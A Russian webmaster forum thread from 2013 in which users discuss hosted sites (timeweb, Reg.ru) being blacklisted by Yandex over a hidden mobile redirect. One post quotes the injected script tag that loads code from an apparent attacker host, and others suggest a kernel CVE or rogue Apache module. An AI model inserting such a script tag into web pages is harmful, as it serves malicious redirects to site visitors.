timeweb.ru взломан?

draff
На сайте с 30.03.2010
Offline
65
#51

У клиента на другом хостинге аналогичная проблема.Яндекс внес в черный список из-за мобильного редиректа.При заходе с под iPhoneMobile Safari,

появляется в head яваскрипт <script type="text/javascript" src="http://html.sdnsistems.net/ldr.php?912015284"></script>. Один раз для одного IP.

Вчера клиент обращалась к хостеру,тот в отказ.

Файлы сайтов на движке Джумла,проверены на все известные редиректы, вирусы,шелл.

Я так понимаю взлом на уровне ОС,и уязвимость свежая за июнь 2013.

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
HM
На сайте с 14.01.2012
Offline
248
#52

draff, не обязательно свежая, скорее всего это майская CVE-2013-2094

F2
На сайте с 06.05.2009
Offline
42
#53

Вчера было тоже самое с двумя сайтами на timeweb

Яндекс заблокировал за вредоносный код. Я все перерыл - ну нет кода и все. Все файлы нетронутые. Гугл молчит. Прогнал через virustotal - только 1 Яндекс недоволен, все остальные рады.

Нажал в Яндексе кнопку ПЕРЕПРОВЕРИТЬ - через 5 минут все страницы стали открываться нормально, а сегодня и значки о заражении из Я.Вебмастера убрались.

Вопрос - это таймвэб мутит? Тогда почему только Яндекс успел заметить? В прошлый раз когда РЕАЛЬНО было заражение - Гугл мне сразу стуканул, а Яндекс так и не заметил.

Склоняюсь что это Яндекс переглючило...

---------- Добавлено 25.06.2013 в 12:21 ----------

hvosting:

В любом случае НЕ сообщать хостеру о проблеме - это тупо.

Вы знаете, если честно, то к некоторым хостерам вообще не хочется обращаться, только когда уже совсем никак. (Это я не про таймвэб, у них более-менее адекватно. Например из последних меня просто выбесила позиция hc.ru, но это к теме не относится.)

draff
На сайте с 30.03.2010
Offline
65
#54
Front2000:
Вчера было тоже самое с двумя сайтами на timeweb
Яндекс заблокировал за вредоносный код. Я все перерыл - ну нет кода и все. Все файлы нетронутые. Гугл молчит. Прогнал через virustotal - только 1 Яндекс недоволен, все остальные рады.
Нажал в Яндексе кнопку ПЕРЕПРОВЕРИТЬ - через 5 минут все страницы стали открываться нормально, а сегодня и значки о заражении из Я.Вебмастера убрались.
Вопрос - это таймвэб мутит?

Эт повезло что хостер быстро отреагировал.Вчера 13:44 Chained

Хостер моего клиента молчит,и два сайта в черном списке.

Volandmax
На сайте с 21.11.2011
Offline
35
#55

Вчера так же сайт клиента попал под эту бяку..хостинг ТаймВеб. Так же пол дня угрохал на проверку файлов как в ручную, так и всякими сервисами и антивирусами.

Сегодня предупреждение Яша снял...но осталось какое то неприятное чувство

F2
На сайте с 06.05.2009
Offline
42
#56

Еще какое неприятное чувство... Представьте, сайт уважаемой компании, клиенты заходят, а там "заблокировано", "вирусы".

PS. Значит Яндекс стал шустрее всех чтоли? Почему другие не видели, Гугл опять же?

HM
На сайте с 14.01.2012
Offline
248
#57

Front2000, потому что клоачат грамотно.

37
На сайте с 15.12.2011
Offline
15
#58

С моими сайтами похожая проблема /ru/forum/799075

Только хостинг у меня от Reg.ru

P
На сайте с 09.05.2013
Offline
5
#59
Front2000:
Представьте, сайт уважаемой компании, клиенты заходят, а там "заблокировано", "вирусы".

это сплошь и рядом сейчас, гораздо более серьезные компании регулярно признают утечки и взломы

Front2000:
PS. Значит Яндекс стал шустрее всех чтоли? Почему другие не видели, Гугл опять же?

основная доля трафика на коммерческих сайтах валит с Яндекса (в рунете), у многих стоит Яндекс.Бар в браузерах (хотя если редирект мобильный то это не так актуально), а Яндекс за счет этого может фиксировать странные (нетипичные) редиректы и быстренько направлять туда нужных проверяющих роботов

3s777:
С моими сайтами похожая проблема /ru/forum/799075
Только хостинг у меня от Reg.ru

некоторые хостеры, ради аптайма, могут не перезагружать сервер (для обновления ядра) по полгода и более, и не стоит потом удивляться, что у них вдруг может появится левый модуль в apache :)

Пишу статьи для продвижения в MiraLinks (/ru/forum/794039) за 100 рублей/статья!
37
На сайте с 15.12.2011
Offline
15
#60

Reg.ru тоже признал свою вину.

Цитирую:

"Да, проблема была со стороны хостинг сервера на котором располагался Ваш сайт."

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий